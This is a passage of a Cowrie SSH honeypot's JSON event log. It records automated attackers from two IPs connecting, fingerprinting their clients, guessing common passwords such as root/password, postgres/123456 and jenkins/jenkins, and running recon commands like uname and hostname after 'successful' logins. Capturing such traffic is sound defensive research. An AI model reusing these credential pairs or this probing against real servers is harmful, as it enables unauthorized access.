ha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:39:04.135900Z","src_ip":"212.227.125.160","session":"2cd7c36a0477"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:39:04.415041Z","src_ip":"212.227.125.160","session":"5f7d4dabb994"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:39:04.415766Z","src_ip":"212.227.125.160","session":"5f7d4dabb994"}
{"eventid":"cowrie.login.success","username":"root","password":"qQ123456","message":"login attempt [root/qQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:39:04.699345Z","src_ip":"212.227.125.160","session":"2cd7c36a0477"}
{"eventid":"cowrie.session.closed","duration":"74.4","message":"Connection lost after 74.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:39:04.888915Z","src_ip":"212.227.235.229","session":"a3c206da003f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:39:05.091236Z","src_ip":"212.227.125.160","session":"2cd7c36a0477"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:39:05.092282Z","src_ip":"212.227.125.160","session":"2cd7c36a0477"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:39:05.281639Z","src_ip":"212.227.125.160","session":"2cd7c36a0477"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:39:05.282891Z","src_ip":"212.227.125.160","session":"2cd7c36a0477"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51980,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2801ae7902a","protocol":"ssh","message":"New connection: 212.227.235.229:51980 (1.2.3.4:22) [session: f2801ae7902a]","sensor":"my-vps","timestamp":"2025-08-31T04:39:07.582965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:39:08.367524Z","src_ip":"212.227.235.229","session":"f2801ae7902a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:39:08.368223Z","src_ip":"212.227.235.229","session":"f2801ae7902a"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456","message":"login attempt [postgres/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:39:14.410691Z","src_ip":"212.227.235.229","session":"f2801ae7902a"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:39:16.278737Z","src_ip":"212.227.235.229","session":"f2801ae7902a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38512,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7b8cdb45697","protocol":"ssh","message":"New connection: 212.227.125.160:38512 (1.2.3.4:22) [session: a7b8cdb45697]","sensor":"my-vps","timestamp":"2025-08-31T04:39:19.821411Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:39:19.822091Z","src_ip":"212.227.125.160","session":"a7b8cdb45697"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:39:20.011381Z","src_ip":"212.227.125.160","session":"a7b8cdb45697"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:39:20.580613Z","src_ip":"212.227.125.160","session":"a7b8cdb45697"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:39:20.973683Z","src_ip":"212.227.125.160","session":"a7b8cdb45697"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:39:20.974379Z","src_ip":"212.227.125.160","session":"a7b8cdb45697"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:39:21.164677Z","src_ip":"212.227.125.160","session":"a7b8cdb45697"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:39:21.165808Z","src_ip":"212.227.125.160","session":"a7b8cdb45697"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38550,"dst_ip":"1.2.3.4","dst_port":22,"session":"b291eb43e249","protocol":"ssh","message":"New connection: 212.227.125.160:38550 (1.2.3.4:22) [session: b291eb43e249]","sensor":"my-vps","timestamp":"2025-08-31T04:39:25.182563Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:39:25.183461Z","src_ip":"212.227.125.160","session":"b291eb43e249"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:39:25.373566Z","src_ip":"212.227.125.160","session":"b291eb43e249"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx123","message":"login attempt [nginx/nginx123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:39:25.943200Z","src_ip":"212.227.125.160","session":"b291eb43e249"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:39:27.135372Z","src_ip":"212.227.125.160","session":"b291eb43e249"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41856,"dst_ip":"1.2.3.4","dst_port":22,"session":"90191e1b63c8","protocol":"ssh","message":"New connection: 212.227.125.160:41856 (1.2.3.4:22) [session: 90191e1b63c8]","sensor":"my-vps","timestamp":"2025-08-31T04:39:28.489722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:39:29.085310Z","src_ip":"212.227.125.160","session":"90191e1b63c8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:39:29.085994Z","src_ip":"212.227.125.160","session":"90191e1b63c8"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456","message":"login attempt [postgres/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:39:30.876524Z","src_ip":"212.227.125.160","session":"90191e1b63c8"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:39:32.601089Z","src_ip":"212.227.125.160","session":"90191e1b63c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37854,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c04fb1dc44a","protocol":"ssh","message":"New connection: 212.227.235.229:37854 (1.2.3.4:22) [session: 1c04fb1dc44a]","sensor":"my-vps","timestamp":"2025-08-31T04:39:36.975944Z"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"jenkins","message":"login attempt [jenkins/jenkins] failed","sensor":"my-vps","timestamp":"2025-08-31T04:39:38.194596Z","src_ip":"212.227.125.160","session":"5f7d4dabb994"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55466,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f2211c52b41","protocol":"ssh","message":"New connection: 212.227.125.160:55466 (1.2.3.4:22) [session: 3f2211c52b41]","sensor":"my-vps","timestamp":"2025-08-31T04:39:41.170943Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:39:41.171597Z","src_ip":"212.227.125.160","session":"3f2211c52b41"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:39:41.353620Z","src_ip":"212.227.125.160","session":"3f2211c52b41"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:39:41.847930Z","src_ip":"212.227.235.229","session":"1c04fb1dc44a"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456","message":"login attempt [git/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:39:41.906419Z","src_ip":"212.227.125.160","session":"3f2211c52b41"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:39:41.917350Z","src_ip":"212.227.235.229","session":"1c04fb1dc44a"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:39:43.091546Z","src_ip":"212.227.125.160","session":"3f2211c52b41"}
{"eventid":"cowrie.session.closed","duration":"51.1","message":"Connection lost after 51.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:39:45.804686Z","src_ip":"212.227.125.160","session":"5f7d4dabb994"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55512,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dec7d882ed7","protocol":"ssh","message":"New connection: 212.227.125.160:55512 (1.2.3.4:22) [session: 0dec7d882ed7]","sensor":"my-vps","timestamp":"2025-08-31T04:39:46.492454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:39:46.493228Z","src_ip":"212.227.125.160","session":"0dec7d882ed7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:39:46.682051Z","src_ip":"212.227.125.160","session":"0dec7d882ed7"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123","message":"login attempt [postgres/123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:39:47.250153Z","src_ip":"212.227.125.160","session":"0dec7d882ed7"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:39:48.441938Z","src_ip":"212.227.125.160","session":"0dec7d882ed7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:39:56.334358Z","src_ip":"212.227.235.229","session":"9f6f74de9bc9"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T04:39:56.335064Z","src_ip":"212.227.235.229","session":"9f6f74de9bc9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60580,"dst_ip":"1.2.3.4","dst_port":22,"session":"8eca99cd88e3","protocol":"ssh","message":"New connection: 212.227.125.160:60580 (1.2.3.4:22) [session: 8eca99cd88e3]","sensor":"my-vps","timestamp":"2025-08-31T04:40:02.644227Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:40:02.645642Z","src_ip":"212.227.125.160","session":"8eca99cd88e3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:40:02.828391Z","src_ip":"212.227.125.160","session":"8eca99cd88e3"}
{"eventid":"cowrie.login.success","username":"root","password":"4r3e2w1q","message":"login attempt [root/4r3e2w1q] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:40:03.378802Z","src_ip":"212.227.125.160","session":"8eca99cd88e3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:40:03.765529Z","src_ip":"212.227.125.160","session":"8eca99cd88e3"}
